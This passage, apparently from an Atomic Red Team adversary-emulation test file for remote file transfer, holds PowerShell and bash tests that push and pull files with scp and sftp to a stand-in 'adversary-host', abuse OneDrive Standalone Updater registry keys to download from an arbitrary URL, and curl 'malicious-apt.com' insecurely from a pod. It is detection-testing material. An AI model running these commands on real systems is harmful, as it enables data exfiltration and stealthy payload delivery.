"OpenSSH.Client~~~~0.0.1.0" try { # Install the OpenSSH Client capability Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green } catch { # Handle any errors that occur during the installation process Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red } executor: elevation_required: true name: powershell command: | # Check if the folder exists, create it if it doesn't $folderPath = "#{local_path}" if (-Not (Test-Path -Path $folderPath)) { New-Item -Path $folderPath -ItemType Directory } # Create the file $filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}" New-Item -Path $filePath -ItemType File -Force Write-Output "File created: $filePath" # Attack command scp.exe #{local_path}\#{file_name} #{username}@#{remote_host}:#{remote_path} cleanup_command: | $filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}" Remove-Item -Path $filePath -Force -erroraction silentlycontinue Write-Output "File deleted: $filePath" - name: Windows pull file using scp.exe auto_generated_guid: 401667dc-05a6-4da0-a2a7-acfe4819559c description: | This test simulates pulling files using SCP on a Windows environment. supported_platforms: - windows input_arguments: remote_path: description: Path of folder to pull type: path default: /tmp/T1105.txt remote_host: description: Remote host to pull from type: string default: adversary-host local_path: description: Local path to receive files type: path default: C:\temp username: description: User account to authenticate on remote host type: string default: adversary dependency_executor_name: powershell dependencies: - description: | This test requires the `scp` command to be available on the system. prereq_command: | if (Get-Command scp -ErrorAction SilentlyContinue) { Write-Output "SCP command is available." exit 0 } else { Write-Output "SCP command is not available." exit 1 } get_prereq_command: | # Define the capability name for OpenSSH Client $capabilityName = "OpenSSH.Client~~~~0.0.1.0" try { # Install the OpenSSH Client capability Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green } catch { # Handle any errors that occur during the installation process Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red } executor: elevation_required: true name: powershell command: | scp.exe #{username}@#{remote_host}:#{remote_path} #{local_path} - name: Windows push file using sftp.exe auto_generated_guid: 205e676e-0401-4bae-83a5-94b8c5daeb22 description: | This test simulates pushing files using SFTP on a Windows environment. supported_platforms: - windows input_arguments: remote_path: description: Path of folder to copy type: path default: /tmp remote_host: description: Remote host to send type: string default: adversary-host local_path: description: Local path to receive sftp type: path default: C:\temp file_name: description: Name of the file to transfer type: string default: T1105.txt username: description: User account to authenticate on remote host type: string default: adversary dependency_executor_name: powershell dependencies: - description: | This test requires the `sftp` command to be available on the system. prereq_command: | if (Get-Command sftp -ErrorAction SilentlyContinue) { Write-Output "SFTP command is available." exit 0 } else { Write-Output "SFTP command is not available." exit 1 } get_prereq_command: | # Define the capability name for OpenSSH Client $capabilityName = "OpenSSH.Client~~~~0.0.1.0" try { # Install the OpenSSH Client capability Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green } catch { # Handle any errors that occur during the installation process Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red } executor: elevation_required: true name: powershell command: | # Check if the folder exists, create it if it doesn't $folderPath = "#{local_path}" if (-Not (Test-Path -Path $folderPath)) { New-Item -Path $folderPath -ItemType Directory } # Create the file $filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}" New-Item -Path $filePath -ItemType File -Force Write-Output "File created: $filePath" # Attack command echo "put #{local_path}\#{file_name}" | sftp #{username}@#{remote_host}:#{remote_path} cleanup_command: | $filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}" Remove-Item -Path $filePath -Force Write-Output "File deleted: $filePath" - name: Windows pull file using sftp.exe auto_generated_guid: 3d25f1f2-55cb-4a41-a523-d17ad4cfba19 description: | This test simulates pulling files using SFTP on a Windows environment. supported_platforms: - windows input_arguments: remote_path: description: Path of file to pull type: path default: /tmp/T1105.txt remote_host: description: Remote host to pull from type: string default: adversary-host local_path: description: Local path to receive files type: path default: C:\temp username: description: User account to authenticate on remote host type: string default: adversary dependency_executor_name: powershell dependencies: - description: | This test requires the `sftp` command to be available on the system. prereq_command: | if (Get-Command sftp -ErrorAction SilentlyContinue) { Write-Output "SFTP command is available." exit 0 } else { Write-Output "SFTP command is not available." exit 1 } get_prereq_command: | # Define the capability name for OpenSSH Client $capabilityName = "OpenSSH.Client~~~~0.0.1.0" try { # Install the OpenSSH Client capability Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green } catch { # Handle any errors that occur during the installation process Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red } executor: elevation_required: true name: powershell command: | sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path} - name: Download a file with OneDrive Standalone Updater auto_generated_guid: 3dd6a6cf-9c78-462c-bd75-e9b54fc8925b description: | Uses OneDrive Standalone Updater to download a file from a specified URL by setting up the required registry keys. This technique can be used to download files without executing anomalous executables. Reference: https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/ supported_platforms: - windows input_arguments: remote_url: description: URL to download file from type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt onedrive_path: description: Path to OneDrive Standalone Updater executable type: path default: 'C:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe' dependency_executor_name: powershell dependencies: - description: | OneDriveStandaloneUpdater.exe must exist on disk at specified location prereq_command: | if (Test-Path "#{onedrive_path}") {exit 0} else {exit 1} get_prereq_command: | Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Please install OneDrive or specify correct path." executor: command: | if (-not (Test-Path "#{onedrive_path}")) { Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Test cannot continue." exit 1 } New-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force | Out-Null Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateRingSettingURLFromOC" -Value "#{remote_url}" -Type String -Force Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "ODSUUpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateOfficeConfigTimestamp" -Value 99999999999 -Type QWord -Force # Run OneDrive Standalone Updater & "#{onedrive_path}" cleanup_command: | Remove-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force -ErrorAction Ignore Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore name: powershell elevation_required: false - name: Curl Insecure Connection from a Pod auto_generated_guid: 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3 description: | Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure) against a target URL. The pod is automatically deleted after execution. supported_platforms: - containers input_arguments: pod_name: description: K8s pod_name to execute the command in type: string default: atomic-insecure-curl remote_url: description: Remote URL to curl type: string default: https://malicious-apt.com image_name: description: Name of the docker image type: string default: curlimages/curl dependencies: - description: kubectl must be installed and configured get_prereq_command: | echo "kubectl must be installed manually" prereq_command: | which kubectl executor: name: bash elevation_required: false command: | kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}